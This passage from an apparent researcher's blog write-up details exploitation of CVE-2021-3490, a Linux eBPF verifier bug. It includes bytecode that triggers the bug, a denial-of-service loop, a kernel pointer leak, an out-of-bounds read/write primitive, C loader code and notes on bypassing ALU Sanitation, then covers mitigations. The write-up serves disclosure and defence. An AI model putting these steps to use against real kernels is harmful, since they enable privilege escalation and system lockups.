35: R0_w=invP0 R2_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R3_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R4_w=invP0 R5_w=invP4294967298 R6_w=map_value(id=0,off=0,ks=4,vs=4919,imm=0) R7_w=invP(id=0) R10=fp0 fp-8=mmmm????
35: (7b) *(u64 *)(r2 +8) = r6
R6 leaks addr into map
```

<p style="text-align: center;"><sub><i>Example verifier log output for an eBPF program rejected by the verifier</i></sub></p>

Keep in mind that if you choose to provide a log output buffer, it should be large enough to receive the entire output. If it is not large enough, _loading the program will fail. This will occur even if the program is valid and passes the verifier checks_. This can occur if you are loading a long program, as the verifier prints output for every instruction on each path it traverses. I ran into this issue while writing my exploit, so I thought it was worth noting.

### Runtime Debugging

Verifier log output provides a lot of useful info, particularly when playing with a verifier vulnerability. Being brand new to eBPF, I wanted to get familiar with the eBPF instruction set. I also wanted to be able to look at the values of registers during program runtime, like in a debugger such as `gdb` or `Windbg`. I found that there isn’t really a straightforward way to do this, but I did find a solution.

As previously mentioned, eBPF programs are either JIT compiled after verification and run natively, or decoded and executed within the eBPF interpreter. This depends on the kernel configuration `CONFIG_BPF_JIT`. If JIT is disabled, eBPF bytecode is decoded and executed in `kernel/bpf/core.c` in the function [`___bpf_prog_run`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/core.c#L13):

```
/**
 *	__bpf_prog_run - run eBPF program on a given context
 *	@regs: is the array of MAX_BPF_EXT_REG eBPF pseudo registers
 *	@insn: is the array of eBPF instructions
 *
 * Decode and execute eBPF instructions.
 */
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
{
...
select_insn:
	goto *jumptable[insn->code];
...
}
```

Register values are pointed to by `regs` and the program instructions by `insn`. To get the value of a register during each instruction of the program, you can simply insert a `printk` statement before each instruction is executed. An example is shown below:

```
static u64 ___bpf_prog_run(u64 *regs, const struct bpf_insn *insn)
{
...
	int lol = 0;

	// Check the first instruction to match the first instruction of
	// the target eBPF program to debug, so output isn't printed for
	// every eBPF program that is run.
	if (insn->code == 0xb7) {
		lol = 1;
	}

select_insn:
	if (lol) {
		printk("instruction is: %0x\n", insn->code);
		printk("r0: %llx, r1: %llx, r2: %llx\n", regs[0], regs[1], regs[2]);
		...
	}
	goto *jumptable[insn->code];
...
}
```

You will need to compile the kernel yourself with `CONFIG_BPF_JIT` disabled. For a quick startup on how to compile a kernel yourself and run it with `qemu`, check out [syzkaller’s guide [11]](https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md). This helped me learn the instruction set, and figure out the calling convention for calling eBPF helper functions. It also helped me identify some new mitigations introduced into ALU Sanitation that I will cover later.

## Exploitation

### Triggering the Vulnerability

The specifics of the bug were covered in the Vulnerability section. Here, I will go through the bytecode that triggers the bug.

Remember, we need two registers with `tnum`s in the same state as shown in the example. That is, one register with `var_off = {mask = 0xFFFFFFFF00000000; value = 0x1}` and one with `var_off = {mask = 0x0; value = 0x100000002}`.

The latter is easy. Since all the bits are known, we can load the register with the constant value. We will store this value in an arbitrary register referred to as `CONST_REG`. Due to the size of the instruction immediate field, we are restricted to working with 32 bit values. We create the 64 bit value `0x100000002` across a few instructions:

```
// Load 1 into the register
BPF_MOV64_IMM(CONST_REG, 0x1)
// Left shift 32 bits, the value is now 0x100000000
BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32)
// Add 2, the value is now 0x100000002
BPF_ALU64_IMM(BPF_ADD, CONST_REG, 2)
```

Now, for the other register: we need to have the upper 32 bits of `mask` set. We can start with a value that is unknown to the verifier, meaning that all the bits of `mask` are set. The most straightforward way to do this is to load a value from an eBPF map. This way, we can also control the actual value at runtime, which will become useful later. First, we need to retrieve a pointer to an eBPF map we create prior to loading the program, which has file descriptor `store_map_fd`.

```
// Load a pointer to the store_map_fd map into R1.
BPF_LD_MAP_FD(BPF_REG_1, store_map_fd)
BPF_MOV64_REG(BPF_REG_2, BPF_STACK_REG)
// Load 0 into R0
BPF_MOV64_IMM(BPF_REG_0, 0)
// Store value of R0=0 at stack_ptr-4. Effectively: *(word*)(stack_ptr-4) = 0
BPF_STX_MEM(BPF_W, BPF_STACK_REG, BPF_REG_0, -4)
// Set R2 = stack_ptr-4
BPF_MOV64_REG(BPF_REG_2, BPF_STACK_REG)
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4)
// Call helper function map_lookup_elem. First parameter is in R1 (map pointer).
// Second parameter is in R2 (ptr to elem index value).
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem)
```

Now a pointer to the first element in our map will be returned in register `R0`. From there we can read from it and load a value into an arbitrary register I will refer to as `EXPLOIT_REG`. That will be our second bug-triggering register.

```
// Read 8 bytes from returned map element pointer and store it in EXPLOIT_REG.
BPF_LDX_MEM(BPF_DW, EXPLOIT_REG, BPF_REG_0, 0)
```

Since user space has full control over what is stored in an eBPF map, the verifier will mark this register as having a completely unknown value. That is, `var_off = {mask = 0xFFFFFFFFFFFFFFFF; value = 0x0}`. Now, we just have to set the lower 32 bits as known with value `1`.
```
// Set R2 to be 0xFFFFFFFF
BPF_MOV64_IMM(BPF_REG_2, 0xFFFFFFFF)
// Left shift R2 32 bits, so the value is now 0xFFFFFFFF00000000
BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32)
// AND EXPLOIT_REG and R2 and store the result in EXPLOIT_REG. The upper 32 bits
// will remain unknown, but the lower 32 bits are known to be zero
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, BPF_REG_2)
// Add 1 to EXPLOIT_REG, it now has mask = 0xFFFFFFFF00000000 and value = 0x1
BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1)
```

Now we trigger the vulnerability by performing an `AND` operation on the two registers we set up.

```
// Trigger the bug, EXPLOIT_REG now has u32_min_value=1, u32_max_value=0
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG)
```

The actual value we store in the map, and thus the value of `EXPLOIT_REG`, will be set to `0`. We’ll use that later on.

### Denial of Service (DoS)

We now have a register `EXPLOIT_REG` with invalid 32 bit bounds `u32_min_value=1` and `u32_max_value=0`. My first attempt at exploitation wasn’t useful for LPE, but it did result in an easy DoS exploit. I learned a bit more about how the verifier patches bytecode in the process.

Recall that the verifier checks all possible execution paths. This can be computationally costly, so optimizations are performed to reduce the number of paths it needs to traverse. One is using the bounds of a register to determine the outcome of a conditional statement. For example:

```
BPF_JMP32_IMM(BPF_JGE, EXPLOIT_REG, 1, 5)
```

The above instruction will jump five instructions if the value of the lower 32 bits of `EXPLOIT_REG` is greater than or equal to `1`. For a `JGE` 32 bit conditional, the verifier will attempt to determine if only one branch is taken by checking the `u32_min_value` of the register:

```
static int is_branch32_taken(struct bpf_reg_state *reg, u32 val, u8 opcode)
{
	struct tnum subreg = tnum_subreg(reg->var_off);
	s32 sval = (s32)val;

	switch (opcode) {
	...
	case BPF_JGE:
		if (reg->u32_min_value >= val)
			return 1;
		else if (reg->u32_max_value < val)
			return 0;
	...
	}
```

Notice that [`is_branch32_taken`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7997) will return true if `u32_min_value >= 1`. Because `EXPLOIT_REG` has the invalid bound `u32_min_value = 1`, it returns `TRUE`. This means that the verifier believes the `TRUE` branch will always be taken, and will not check the `FALSE` branch. In reality, `EXPLOIT_REG` will have a value of `0` at runtime, so it _will_ take the `FALSE` branch. This means that we can put any instructions we’d like in the `FALSE` branch and the verifier won’t check them for safety!

At this point, I thought that I would be able to insert the rest of my exploit into this branch and have free rein. However, the verifier patches all instructions in “dead” branches.

```
/* The verifier does more data flow analysis than llvm and will not
 * explore branches that are dead at run time. Malicious programs
 * can have dead code too. Therefore replace all dead at-run-time
 * code with 'ja -1'.
 *
 * Just nops are not optimal, e.g. if they would sit at the end of
 * the program and through another bug we would manage to jump
 * there, then we'd execute beyond program memory otherwise.
 * Returning exception code also wouldn't work since we can have
 * subprogs where the dead code could be located.
 */
static void sanitize_dead_code(struct bpf_verifier_env *env)
{
	struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
	struct bpf_insn trap = BPF_JMP_IMM(BPF_JA, 0, 0, -1);
	struct bpf_insn *insn = env->prog->insnsi;
	const int insn_cnt = env->prog->len;
	int i;

	for (i = 0; i < insn_cnt; i++) {
		if (aux_data[i].seen)
			continue;
		memcpy(insn + i, &trap, sizeof(trap));
	}
}
```

Above, the function [`sanitize_dead_code`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L11570) is where this patching occurs. Interestingly, it patches all the dead instructions with a `jmp -1` instruction. This means that once execution hits the dead code path, the patched jump keeps landing back where it started, over and over, in a never ending loop. This leaves the kernel thread spinning forever. You can run a few instances of the exploit, lock up all available kernel threads, and cause a DoS.

### Map Pointer Leak

My second instinct was to use the register with invalid boundaries to widen the “safe” range for pointer arithmetic. As previously mentioned, the verifier keeps track of which registers contain pointers and which contain scalars. While I was looking at the code I came across an interesting snippet:

```
/* Handles arithmetic on a pointer and a scalar: computes new min/max and var_off.
 * Caller should also handle BPF_MOV case separately.
 * If we return -EACCES, caller may want to try again treating pointer as a
 * scalar. So we only emit a diagnostic if !env->allow_ptr_leaks.
 */
static int adjust_ptr_min_max_vals(struct bpf_verifier_env *env,
				   struct bpf_insn *insn,
				   const struct bpf_reg_state *ptr_reg,
				   const struct bpf_reg_state *off_reg)
{
...
	bool known = tnum_is_const(off_reg->var_off);
	s64 smin_val = off_reg->smin_value, smax_val = off_reg->smax_value,
	    smin_ptr = ptr_reg->smin_value, smax_ptr = ptr_reg->smax_value;
	u64 umin_val = off_reg->umin_value, umax_val = off_reg->umax_value,
	    umin_ptr = ptr_reg->umin_value, umax_ptr = ptr_reg->umax_value;
...
	if ((known && (smin_val != smax_val || umin_val != umax_val)) ||
	    smin_val > smax_val || umin_val > umax_val) {
		/* Taint dst register if offset had invalid bounds derived
		 * from e.g. dead branches.
		 */
		__mark_reg_unknown(env, dst_reg);
		return 0;
	}
...
}
```

The function [`adjust_ptr_min_max_vals`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L6672) shown above is called for arithmetic instructions involving a pointer. The register `off_reg` represents the offset scalar register being added to a pointer register. Notice that if the offset register has bounds such that `umin_value > umax_value`, the function `__mark_reg_unknown` is called on the destination register. This function marks the register as containing an unknown scalar value.

This means that if we have a register `EXPLOIT_REG` with bounds `umin_value > umax_value` and add it to a destination pointer register, the pointer register will be changed to a scalar. So, the verifier will no longer think that the register contains a pointer! This is notable because the verifier will now allow us to leak its value to user space by storing it in an eBPF map.
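Before looking at the bytecode for the leak itself, it is worth sketching the user space half of the flow: load the crafted program, attach it to a socket we own, write to the socket so the program runs, then read the leaked pointer back out of the store map. The snippet below is only an illustrative sketch of that plumbing (the helper names and the socketpair trigger are the standard socket-filter setup, not necessarily identical to the released PoC), with error handling omitted:

```
#include <linux/bpf.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <unistd.h>

#ifndef SO_ATTACH_BPF
#define SO_ATTACH_BPF 50
#endif

static long bpf(int cmd, union bpf_attr *attr, unsigned int size)
{
    return syscall(__NR_bpf, cmd, attr, size);
}

/* Load a socket-filter program from an array of instructions. */
static int prog_load(const struct bpf_insn *insns, uint32_t insn_cnt)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.prog_type = BPF_PROG_TYPE_SOCKET_FILTER;
    attr.insns     = (uint64_t)(unsigned long)insns;
    attr.insn_cnt  = insn_cnt;
    attr.license   = (uint64_t)(unsigned long)"GPL";
    return bpf(BPF_PROG_LOAD, &attr, sizeof(attr));
}

/* Read one element of the store map back into user space. */
static int map_lookup(int map_fd, uint32_t key, void *value)
{
    union bpf_attr attr;

    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key    = (uint64_t)(unsigned long)&key;
    attr.value  = (uint64_t)(unsigned long)value;
    return bpf(BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

/* Load the crafted program, attach it to a socket we own, trigger it with a
 * write, then read the leaked map address out of the store map. */
static void run_leak(const struct bpf_insn *insns, uint32_t insn_cnt, int store_map_fd)
{
    uint64_t leaked_map_addr = 0;
    int prog_fd = prog_load(insns, insn_cnt);
    int socks[2];
    char byte = 0;

    socketpair(AF_UNIX, SOCK_DGRAM, 0, socks);
    setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd));
    write(socks[1], &byte, sizeof(byte));        /* the eBPF program runs here */

    map_lookup(store_map_fd, 0, &leaked_map_addr);
    printf("leaked map address: 0x%llx\n", (unsigned long long)leaked_map_addr);
}
```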
First, we need to extend the invalid 32 bit bounds `u32_min_value, u32_max_value` to their 64 bit counterparts `umin_value, umax_value`.

```
// Zero extend the lower 32 bits of EXPLOIT_REG
BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG)
```

Next, perform any arithmetic operation on a map pointer stored in `OOB_MAP_REG`, using `EXPLOIT_REG` as the offset. Then store the result in the map pointed to by `STORE_MAP_REG`, another eBPF map that can be accessed from user space.

```
BPF_ALU64_REG(BPF_ADD, OOB_MAP_REG, EXPLOIT_REG)
BPF_STX_MEM(BPF_DW, STORE_MAP_REG, OOB_MAP_REG, 0)
```

We have now leaked the kernel address of an eBPF map, which we will use later on in the exploit!

_Note: this can also be done once we have established kernel read/write primitives, by accessing the_ `private_data` _structure of the file from the_ `fd`_, which we can get once we have the address of the thread’s_ `task_struct`_. However, this requires many more dependencies on hardcoded kernel offsets. I like to avoid this whenever possible, as it makes exploits more annoying to maintain. I thought this shortcut was a nice improvement._

### Verifier Range Tracking Primitive

Now, we create a primitive that will allow us to make out of bounds read/writes. This will give us arbitrary read/write in the kernel. The idea is that we can create a register that the verifier believes has a value of `0`, but really has a value of `1` during runtime.

First, trigger the bug, so that we have `EXPLOIT_REG` with invalid 32 bit bounds `u32_max_value = 0 < u32_min_value = 1`. Next, add 1 to `EXPLOIT_REG`.

```
BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1)
```

In the case of immediate instructions, the immediate value is simply added to all the bounds, if adding the value will not cause an overflow. Thus, after adding `1` to `EXPLOIT_REG`, we have `u32_max_value = 1` and `u32_min_value = 2`, with `var_off = {mask = 0x100000000; value = 0x1}`.

Now we need a register with an initially unknown value. Let’s call this register `UNKNOWN_VALUE_REG`. We create the register the same way as before, by loading a value from an eBPF map. The real runtime value of the register will be `0`. Then, we start to manipulate the bounds of the register by adding a conditional `jmp` statement:

```
BPF_JMP32_IMM(BPF_JLE, UNKNOWN_VALUE_REG, 1, 1)
BPF_EXIT_INSN()
```

The above conditional `jmp32` instruction will skip the exit instruction if the value of the lower 32 bits of the register is less than or equal to `1`. Because the actual value of the register will be `0`, the conditional statement will evaluate to `TRUE` and the exit instruction will be skipped. However, because the verifier does not know what the value will be, the 32 bit bounds of the register in the `TRUE` branch will be set to: `u32_min_value = 0` and `u32_max_value = 1`.

Remember, the `jmp` was conditional on the lower 32 bits, so the upper 32 bits are still unknown. The lowest bit is also unknown, since it can be either `0` or `1`. So this register has `var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}`.

Now, let’s look at how these bounds are updated when two registers are added together:

```
BPF_ALU64_REG(BPF_ADD, EXPLOIT_REG, UNKNOWN_VALUE_REG)
```

First, in [`adjust_scalar_min_max_vals`](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L7479):

```
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,
				      struct bpf_insn *insn,
				      struct bpf_reg_state *dst_reg,
				      struct bpf_reg_state src_reg)
{
...
	switch (opcode) {
	case BPF_ADD:
		scalar32_min_max_add(dst_reg, &src_reg);
		scalar_min_max_add(dst_reg, &src_reg);
		dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
		break;
...
}
```

The scalar add functions are called. Let’s look at the [32 bit case](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L6908):

```
static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,
				 struct bpf_reg_state *src_reg)
{
	s32 smin_val = src_reg->s32_min_value;
	s32 smax_val = src_reg->s32_max_value;
	u32 umin_val = src_reg->u32_min_value;
	u32 umax_val = src_reg->u32_max_value;
...
	if (dst_reg->u32_min_value + umin_val < umin_val ||
	    dst_reg->u32_max_value + umax_val < umax_val) {
		dst_reg->u32_min_value = 0;
		dst_reg->u32_max_value = U32_MAX;
	} else {
		dst_reg->u32_min_value += umin_val;
		dst_reg->u32_max_value += umax_val;
	}
}
```

If the addition operation doesn’t overflow either of the bounds, the bounds of the destination and source register are simply added together. This will result in `EXPLOIT_REG` having new 32 bit bounds: `u32_min_value = 2, u32_max_value = 2`.

Next, back in the snippet of `adjust_scalar_min_max_vals` above, `tnum_add` is called and the result saved to `var_off` of the destination register. This function returns what is still known after adding two `tnum`s together. Our registers are:

- `EXPLOIT_REG`: `var_off = {mask = 0x100000000; value = 0x1}`
- `UNKNOWN_VALUE_REG`: `var_off = {mask = 0xFFFFFFFF00000001; value = 0x0}`

Because the upper 32 bits of `UNKNOWN_VALUE_REG` are unknown, the upper 32 bits of the result will also be unknown. The same goes for the lowest bit - it could be either `0` or `1`. Since the lowest bit of `EXPLOIT_REG` is known to be `1`, the result of adding the two bits could be either `1` or `2`. This means that the second lowest bit is also unknown. The rest of the lower 32 bits are known to be `0` in both the destination and source. This leaves `EXPLOIT_REG` with `var_off = {mask = 0xFFFFFFFF00000003; value = 0x0}`.

Recall that the verifier will now call three more functions that affect the bounds of the destination register: `__update_reg_bounds`, `__reg_deduce_bounds`, and `__reg_bound_offset`. In `__update_reg32_bounds`, where `var32_off` is the lower 32 bit portion of `var_off` for the destination register `EXPLOIT_REG`:

```
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
			 (u32)(var32_off.value | var32_off.mask));
```

Luckily, the bounds remain unchanged. Since `2 > 0`, the min bound remains the same. For the max bound, we are not comparing against `var32_off.value = 0`, but `var32_off.value | var32_off.mask = 3`. So, since `2 < 3`, the max bound also remains the same. Similar logic applies to the signed bounds. Since the signed and the unsigned 32 bit bounds are all equal, they are not modified by `__reg32_deduce_bounds`.

Last, in `__reg_bound_offset`, we have:

```
struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
				       tnum_range(reg->u32_min_value,
						  reg->u32_max_value));
```

Here, `tnum_subreg(reg->var_off)` is the lower 32 bit component of `var_off` for our destination register, `EXPLOIT_REG`. Recall that since `u32_min_value = u32_max_value`, `tnum_range` will return a `tnum` that has a known constant value of `2`, since the range only includes one integer value. Since the current `var_off` only has the lowest two bits of its lower half unknown (`mask = 0x3`), `tnum_intersect` leaves the lower 32 bits fully known and equal to `2`!

After all that, we have `EXPLOIT_REG` with bounds: `{u,s}32_min_value = {u,s}32_max_value = 2`, `var_off = {mask = 0xFFFFFFFF00000000; value = 0x2}`.
That is to say, a register whose lower 32 bits are known and equal to `2`. During runtime though, the register is equal to `1`! All that’s left to do is zero extend the lower 32 bits of the register and do a simple `AND` operation:

```
BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG)
BPF_ALU64_IMM(BPF_AND, EXPLOIT_REG, 1)
```

The verifier will now believe `EXPLOIT_REG = 0` because `2 & 1 = 0`, but at runtime it will be equal to `1`. We can now use this register to do OOB read/writes on eBPF map pointers.

### ALU Sanitation

The strategy to bypass ALU Sanitation is excellently described in [this blog](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification) by [Manfred Paul](https://twitter.com/_manfp). Here he details the LPE exploitation strategy he used in Pwn2Own 2020. Interestingly, this bypass was not needed at the time of the 2020 competition. When testing my exploit, I found that it was failing on some newer (but still vulnerable) Ubuntu kernels. The reason was that I was not bypassing ALU Sanitation.

During my initial research period I looked at many different public eBPF verifier exploits. Strangely, I didn’t see an ALU Sanitation bypass in any of them! After some investigation I discovered the reason. There was an integer underflow bug when calculating the `alu_limit` in the verifier. It was present until March 2021, when it was fixed in [this commit [17]](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/patch/?id=10d2bb2e6b1d8c4576c56a748f697dbeb8388899).

The bug is triggered when `alu_limit = 0`. An example case is doing a subtraction operation with a pointer at the start of a map. The sanitation instruction that was patched in:

```
*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);
```

Subtracting `1` from an `alu_limit` of `0` results in an effective limit of `0xFFFFFFFF`. The common strategy for eBPF verifier exploits depends on modifying the `bpf_map` structure found in the memory chunk before the map’s memory. This is done by subtracting from a map pointer. Against exploits of this type, ALU Sanitation was rendered completely useless by this bug, and it went unnoticed even though many PoCs were publicly available. Of course, ALU Sanitation can be easily bypassed regardless.

The new implementation of ALU Sanitation is much more effective against these attacks, which I will go over in the Mitigations section.

### Finishing Up the LPE

We have established the primitive: a register `EXPLOIT_REG` which the verifier believes to be `0` but is actually equal to `1` at runtime. The next steps are beautifully outlined in Manfred Paul’s [blog post](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification). You can check out my [released PoC](https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490) to see the implementation.

## Demo

<iframe width="100%" height="500" src="https://www.youtube.com/embed/EtQieYKtTY8" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen></iframe>

## Mitigations

### Unprivileged eBPF

As mentioned in the introduction, running eBPF programs can be disallowed for unprivileged users by setting the `sysctl` knob `kernel.unprivileged_bpf_disabled`. In May 2021, a new `kconfig` knob, `BPF_UNPRIV_DEFAULT_OFF`, was introduced that sets this `sysctl` knob by default [ [7]](https://www.spinics.net/lists/netdev/msg740795.html).
Enabling these configurations will protect against attacks by disallowing unprivileged users from \[ab\]using eBPF. However, this doesn’t mitigate the problem completely. A privileged user can still use the arbitrary kernel write in this exploit to bypass or disable kernel security modules like `SELinux`.

### ALU Sanitation

As of April 2021, the implementation of ALU Sanitation has changed [ [15]](https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0). The new implementation helps mitigate attacks like the one demonstrated in this blog.

First, the way `alu_limit` is calculated has changed. Now, instead of the position of the pointer register, the bounds of the offset register are used to compute it. For example, suppose we have some register with unsigned bounds `umax_value = 1`, `umin_value = 0`. Then, the computed `alu_limit = 1`. This means that if the register is outside of those bounds during runtime, pointer arithmetic does not occur using that register.

Additionally, ALU sanitation now patches pointer operation instructions if the scalar register is [known to be constant](https://github.com/torvalds/linux/blob/c9e73e3d2b1eb1ea7ff068e05007eec3bd8ef1c9/kernel/bpf/verifier.c#L12376).

```
bool off_is_imm = tnum_is_const(off_reg->var_off);

alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0;

isimm = aux->alu_state & BPF_ALU_IMMEDIATE;
...
if (isimm) {
	*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);
} else {
	// Patch alu_limit check instructions
	....
}
```

The above patch shows that the offset register is only checked against its `alu_limit` if it is not known to be constant. If it is constant, the operation is patched with an immediate instruction using its _constant value_.

Here’s an example. Suppose we have the following instruction:

```
BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG)
```

Here, `BPF_REG_2` contains a pointer to a map, and `EXPLOIT_REG` is a register the verifier believes has a value of `0`, but whose runtime value is `1`. The ALU Sanitation will apply a patch such that the effective instruction is:

```
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0)
```

The intention is to mitigate against [speculative execution side-channel vulnerabilities](https://meltdownattack.com/) [ [16]](https://spectreattack.com/spectre.pdf), but it also serves to thwart attack methods such as the one presented in this blog. Sadly, this marks the end of an era for this elegant exploit primitive against the eBPF verifier. While this will make exploiting vulnerabilities like [CVE-2021-3490](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490) harder, I do not think this will be the end of exploitation with eBPF. I’ll discuss this further in the next section.

### Future Considerations

Since the introduction of eBPF, there have been a number of privilege escalation attacks that leverage the technology. In addition to exploiting vulnerabilities in eBPF itself, it also represents a powerful primitive for exploiting other kernel vulnerabilities. While eBPF can be a great tool for developers, there’s still more work to be done to harden it further.

Despite the new mitigations discussed in the ALU Sanitation section, exploits like the one demonstrated in the DoS exploitation section will still work. Patching dead code branches with exit instructions instead of backward jumps would prevent these types of attacks.
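As a rough illustration of that suggestion (and only that — the kernel’s own comment in `sanitize_dead_code` notes that exception-style patching is complicated by subprograms), the change could look something like swapping the backward jump for an exit instruction:

```
/* Hypothetical variant of sanitize_dead_code(): patch unreachable
 * instructions with an exit instead of a backward jump, so that a bug which
 * lands execution in a "dead" region terminates the program rather than
 * looping forever. This ignores the subprogram concern mentioned in the
 * kernel's comment and is only a sketch of the idea. */
static void sanitize_dead_code_with_exit(struct bpf_verifier_env *env)
{
	struct bpf_insn_aux_data *aux_data = env->insn_aux_data;
	struct bpf_insn trap = BPF_EXIT_INSN();
	struct bpf_insn *insn = env->prog->insnsi;
	const int insn_cnt = env->prog->len;
	int i;

	for (i = 0; i < insn_cnt; i++) {
		if (aux_data[i].seen)
			continue;
		memcpy(insn + i, &trap, sizeof(trap));
	}
}
```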
An LPE exploit [writeup](https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt) by Qualys published in July 2021 uses a memory corruption vulnerability to overwrite an eBPF program buffer, which contains the eBPF bytecode for a loaded program. Instead of fooling the verifier, the program is valid and passes verification. The buffer is overwritten after verification but before JIT compilation to achieve OOB read/write capabilities [ [8]](https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt). As this exploit demonstrates, the window after validation and before JIT compilation is not small, and a race can be won to land a targeted write.

The eBPF program buffer memory should be marked read-only before verification, so that it can’t be modified during verification, and stay read-only until JIT compilation. This would prevent eBPF from being used as a powerful primitive when exploiting kernel memory corruption vulnerabilities. This was first suggested by [Brad Spengler](https://twitter.com/spendergrsec) in 2016 [ [9]](https://twitter.com/spendergrsec/status/1417487276075012109).

## Acknowledgements

[Manfred Paul](https://twitter.com/_manfp), for the original vulnerability discovery, and the [excellent writeup](https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification) on exploiting [CVE-2020-8835](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8835), an eBPF verifier vulnerability.

[Simon Scannell](https://twitter.com/scannell_simon), for a great [eBPF fuzzing and exploitation writeup](https://scannell.io/posts/ebpf-fuzzing/), as well as an excellent [PoC](https://github.com/scannells/exploits/tree/master/CVE-2020-27194) exploiting [CVE-2020-27194](https://nvd.nist.gov/vuln/detail/CVE-2020-27194), another eBPF verifier vulnerability. I used this PoC to learn about eBPF bytecode and exploitation.

[Andréa](https://twitter.com/and_zza), for her excellent work helping with graphics and the publishing of this blog post.

## References

1. https://qmonnet.github.io/whirl-offload/2016/09/01/dive-into-bpf/
2. https://www.collabora.com/news-and-blog/blog/2019/04/15/an-ebpf-overview-part-2-machine-and-bytecode/
3. https://www.spinics.net/lists/xdp-newbies/msg00185.html
4. https://www.zerodayinitiative.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification
5. https://blog.stackpath.com/bpf-hook-points-part-1/
6. https://prototype-kernel.readthedocs.io/en/latest/bpf/ebpf_maps.html
7. https://www.spinics.net/lists/netdev/msg740795.html
8. https://www.qualys.com/2021/07/20/cve-2021-33909/sequoia-local-privilege-escalation-linux.txt
9. https://twitter.com/spendergrsec/status/1417487276075012109
10. https://github.com/qmonnet/rbpf
11. https://github.com/google/syzkaller/blob/master/docs/linux/setup_ubuntu-host_qemu-vm_x86-64-kernel.md
12. https://elixir.bootlin.com/linux/latest/source/include/uapi/linux/bpf.h#L65
13. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3490
14. https://man7.org/linux/man-pages/man2/bpf.2.html
15. https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=7fedb63a8307dda0ec3b8969a3b233a1dd7ea8e0
16. https://meltdownattack.com/
17. https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/patch/?id=10d2bb2e6b1d8c4576c56a748f697dbeb8388899
18. https://github.com/iovisor/bcc